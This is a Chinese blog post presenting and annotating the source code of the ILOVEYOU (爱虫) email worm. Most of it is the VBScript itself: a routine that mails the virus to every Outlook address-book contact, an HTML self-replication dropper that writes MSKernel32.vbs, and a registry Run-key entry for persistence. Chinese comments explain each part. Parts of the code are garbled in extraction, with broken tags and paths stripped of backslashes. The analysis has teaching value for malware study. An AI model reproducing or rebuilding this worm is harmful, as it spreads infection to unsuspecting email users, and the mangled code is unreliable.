爱虫病毒源代码分析

最新推荐文章于 2025-03-25 22:47:50 发布

manio

最新推荐文章于 2025-03-25 22:47:50 发布

阅读量1.1w

点赞数 14

文章标签：代码分析 vbscript microsoft function html generator

本文链接：https://blog.csdn.net/manio/article/details/1363114

版权

< ! --

这是爱虫病毒的源代码，爱虫病毒通过邮件传播，但是只局限于outlook的用户，病毒作者通过邮件的内容引诱收件人打开邮件的附件。而事实上，附件是一个.vbs的vbscript脚本程序，当用户打开这个文件时，病毒找到计算机上的所有邮件地址，并把自己作为附件粘到附件里并发送出去。而且会把自己得复制到系统目录中，而且会修改注册表，做系统在启动时运行病毒代码。

-->

< HTML >< HEAD >

< Title > Help </ Title ></ HEAD >

< Body > < script language = ' VBScript'>

' ========================

功能：读取注册表的值

参数：注册表键值键值位置

========================= '

function regget(value)

Set regedit = CreateObject ( " WScript.Shell " ) ' 新建一个Wscript.Shell对象，此对象可读取windows注册表值'

regget = regedit.RegRead(value) ' RegRead是Wscript.Shell对象读注册表的方法'

end function

' ========================

功能：测试文件是否存在

参数：文件路径

返回值：存在返回0,不存在返回1

========================= '

function fileexist(filespec)

On Error Resume Next

dim msg

if (fso.FileExists(filespec)) Then ' 如果文件存在msg=0否则msg=1'

msg = 0

else

msg = 1

end if

fileexist = msg

end function

' ========================

功能：测试文件夹是否存在

参数：文件夹路径

返回值：存在返回0,不存在返回1

========================= '

function folderexist(folderspec)

On Error Resume Next

dim msg

if (fso.GetFolderExists(folderspec)) then

msg = 0

else

msg = 1

end if

fileexist = msg

end function

' ==========================Sub spreadtoemail======================================='

sub spreadtoemail()

On Error Resume Next

dim x, a, ctrlists, ctrentries, malead, b, regedit, regv, regad

set regedit = CreateObject ( " WScript.Shell " )

set out = WScript.CreateObject( " Outlook.Application " ) ' 创建一个OUTLOOK应用的对象 '

set mapi = out.GetNameSpace( " MAPI " ) ' 取得MAPI名字空间 '

' ===for 遍历整个mapi的地址列表=='

for ctrlists = 1 to mapi.AddressLists.Count

set a = mapi.AddressLists(ctrlists) ' a是邮件地址'

x = 1

regv = regedit.RegRead( " HKEY_CURRENT_USERSoftwareMicrosoftWAB " & a)

if (regv = "" ) then

regv = 1

end if

if ( int (a.AddressEntries.Count) > int (regv)) then

' =======for========'

for ctrentries = 1 to a.AddressEntries.Count

malead = a.AddressEntries(x) ' malead变量存放邮件地址，可能是因为病毒作者英文不太好，他可能本来是想写mailad(mail address)的'

regad = ""

regad = regedit.RegRead( " HKEY_CURRENT_USERSoftwareMicrosoftWAB " & malead)

if (regad = "" ) then

set male = out.CreateItem( 0 ) ' 新建邮件对象'

male.Recipients.Add(malead) ' 把邮件列表时的一个地址加到这个邮件的收件人里'

male.Subject = " ILOVEYOU " ' “爱虫”的标志，邮件的主题是ILOVEYOU'

male.Body = vbcrlf & " kindly check the attached LOVELETTER coming from me. " ' vbcrlf相当于回车符和换行符的组合，这一行是设定邮件的正文，引诱收件人打开邮件的附件'

male.Attachments.Add(dirsystem & " LOVE-LETTER-FOR-YOU.TXT.vbs " ) ' 把病毒自己附在邮件里'

male.Send ' 发送邮件'

regedit.RegWrite " HKEY_CURRENT_USERSoftwareMicrosoftWAB " & malead, 1 , " REG_DWORD " ' 把地址写入注册表'

end if

x = x + 1

' ======end of for======'

regedit.RegWrite " HKEY_CURRENT_USERSoftwareMicrosoftWAB " & a,a.AddressEntries.Count

else

regedit.RegWrite " HKEY_CURRENT_USERSoftwareMicrosoftWAB " & a,a.AddressEntries.Count

end if

' ===========end of for=============='

Set out = Nothing

Set mapi = Nothing

end sub

' ========================End Sub======================================='

' ==========================Sub html===================================='

sub html

On Error Resume Next

dim lines, n, dta1, dta2, dt1, dt2, dt3, dt4, l1, dt5, dt6

' ==========

下面这段是设定一个html文件，让病毒能通过浏览器传播，因为要注释，而下面又是一个单独的变量，所以会破坏变量

因为不能在变量中放置 / 双引号单引号 ,所以要用一些符号替代，最后再替换回来

在下面 ? - ?相当于 / ，@ - @相当于双引号，# - #相当于单引号， ^-^ 相当于，在后面会用replace()函数替换回来

=========== '

dta1 = " <HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME=@-@Generator@-@

CONTENT = @ - @BAROK VBS - LOVELETTER@ - @ > " &vbcrlf& _

" <META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder(AT)mail.com ?-? @GRAMMERSoft '这里有一些病毒作者的信息，'

Group ? - ? Manila, Philippines ? - ? March 2000 @ - @ > " &vbcrlf& _

" <META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...@-@> " ' 病毒作者写给大家的话'

& vbcrlf & _

" <?-?HEAD><BODY ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER- '当鼠标移出网页区域时，打开LOVE-LETTER-FOR-YOU.HTM(就是这个病毒文件)'

FOR - YOU.HTM# - #,# - #main# - #)@ - @ " &vbcrlf& _

" ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,# '当有键按下里时，打开LOVE-LETTER-FOR-YOU.HTM(就是这个病毒文件)'

- #main# - #)@ - @ BGPROPERTIES = @ - @fixed@ - @ BGCOLOR = @ - @#FF9933@ - @ > " &vbcrlf& _

" <CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this H

TML file

< BR >- Please press # - #YES# - # button to Enable ActiveX < ? - ?p > " &vbcrlf& _

" <?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@>----------z-------

------------

- z ----------< ? - ?MARQUEE > " &vbcrlf& _

" <?-?BODY><?-?HTML> " & vbcrlf & _

" <SCRIPT language=@-@JScript@-@> " & vbcrlf & _

" <!--?-??-? " & vbcrlf & _

" if (window.screen){var wi=screen.availWidth;var hi=screen.availHeight;window.mo

veTo( 0 , 0 );window.resizeTo(wi,hi);} " &vbcrlf& _

" ?-??-?--> " & vbcrlf & _

" <?-?SCRIPT> " & vbcrlf & _

" <SCRIPT LANGUAGE=@-@VBScript@-@> " & vbcrlf & _

" <!-- " & vbcrlf & _

" on error resume next " & vbcrlf & _

" dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit " & vbcrlf & _

" aw=1 " & vbcrlf & _

" code= "

dta2 = " set fso=CreateObject(@-@Scripting.FileSystemObject@-@) " & vbcrlf & _

" set dirsystem=fso.GetSpecialFolder(1) " & vbcrlf & _

" code2=replace(code,chr(91)&chr(45)&chr(91),chr(39)) " & vbcrlf & _

" code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34)) " & vbcrlf & _

" code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92)) " & vbcrlf & _

" set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@) " & vbcrlf & _

" wri.write code4 " & vbcrlf & _

" wri.close " & vbcrlf & _

" if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then " & vbcrlf & _

" if (err.number=424) then " & vbcrlf & _

" aw=0 " & vbcrlf & _

" end if " & vbcrlf & _

" if (aw=1) then " & vbcrlf & _

" document.write @-@ERROR: can#-#t initialize ActiveX@-@ " & vbcrlf & _

" window.close " & vbcrlf & _

" end if " & vbcrlf & _

" Set regedit = CreateObject(@-@WScript.Shell@-@) " & vbcrlf & _

" regedit.RegWrite @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^Curre '在电脑重启时运行病毒脚本'

ntVersion ^-^ Run ^-^ MSKernel32@ - @,dirsystem & @ - @ ^-^ MSKernel32.vbs@ - @ " &vbcrlf& _

" ?-??-?--> " & vbcrlf & _

" <?-?SCRIPT> "

dt1 = replace (dta1, chr ( 35 ) & chr ( 45 ) & chr ( 35 ), " ' " ) ' 把几个变量中刚才的替代符号换回来'

dt1 = replace (dt1, chr ( 64 ) & chr ( 45 ) & chr ( 64 ), " "" " )

dt4 = replace (dt1, chr ( 63 ) & chr ( 45 ) & chr ( 63 ), " / " )

dt5 = replace (dt4, chr ( 94 ) & chr ( 45 ) & chr ( 94 ), " " )

dt2 = replace (dta2, chr ( 35 ) & chr ( 45 ) & chr ( 35 ), " ' " )

dt2 = replace (dt2, chr ( 64 ) & chr ( 45 ) & chr ( 64 ), " "" " )

dt3 = replace (dt2, chr ( 63 ) & chr ( 45 ) & chr ( 63 ), " / " )

dt6 = replace (dt3, chr ( 94 ) & chr ( 45 ) & chr ( 94 ), " " )

set fso = CreateObject ( " Scripting.FileSystemObject " )

set c = fso.OpenTextFile(WScript.ScriptFullName, 1 ) ' 病毒自己打开自己,WScript.ScriptFullName是自己的路径'

lines = Split (c.ReadAll, vbcrlf) ' 把vbcrlf分开的部份放到lines数组中'

l1 = ubound (lines) ' l1是数组上界'

for n = 0 to ubound (lines) ' 把几个变量中刚才的替代符号换回来'

lines(n) = replace (lines(n), " ' " , chr ( 91 ) + chr ( 45 ) + chr ( 91 ))

lines(n) = replace (lines(n), " "" " , chr ( 93 ) + chr ( 45 ) + chr ( 93 ))

lines(n) = replace (lines(n), " " , chr ( 37 ) + chr ( 45 ) + chr ( 37 ))

if (l1 = n) then ' 这个if没用'

else

end if

set b = fso.CreateTextFile(dirsystem + " LOVE-LETTER-FOR-YOU.HTM " ) ' 在复制自己到本机上，病毒的特点之一，先新建一个文件，再打开，把病毒代码写进去'

b.close

set d = fso.OpenTextFile(dirsystem + " LOVE-LETTER-FOR-YOU.HTM " , 2 )

d.write dt5

d.write join (lines, vbcrlf)

d.write vbcrlf

d.write dt6

d.close

end sub

' ==========================End Sub spreadtoemail======================================='

</ script >

</ Body ></ HTML >